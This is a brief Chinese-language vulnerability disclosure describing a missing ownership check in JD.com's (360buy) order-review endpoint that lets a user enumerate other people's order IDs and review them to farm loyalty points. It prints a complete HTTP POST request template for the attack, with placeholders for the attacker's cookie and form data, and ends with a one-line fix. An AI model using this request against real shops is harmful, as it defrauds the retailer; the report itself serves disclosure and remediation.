京东商城购物完成后,评价大于100元的商品,可以获得2积分.但订单没有判断是否是自己的订单.可遍历订单号.刷积分.
POST /JdVote/TradeComment.aspx?ruleid=订单ID HTTP/1.1
Host: market.360buy.com
Connection: keep-alive
Content-Length: 2171
Cache-Control: max-age=0
Origin: http://market.360buy.com
User-Agent: Mozilla/5.0 (Windows NT 6.0) ApplewebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://market.360buy.com/JdVote/TradeComment.aspx?ruleid=订单ID
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: //选择自己登录帐号的cookie
__VIEWSTATE=%2FwEPDwUKLTUwMDExOTM4NmRkZrYhmLNgGlJ8UkLhdtmyQgAAAAA%3D;__EVENTVALIDATION=%2FwEWAgLJwd6dDgLhzbL9DzQla7Kw%2FebVQMxO6TJAYW8AAAAA;hischeck1=1...此处抓取随便一次评价的表单内容
修复方案:
评价后台先判断是否自己的订单
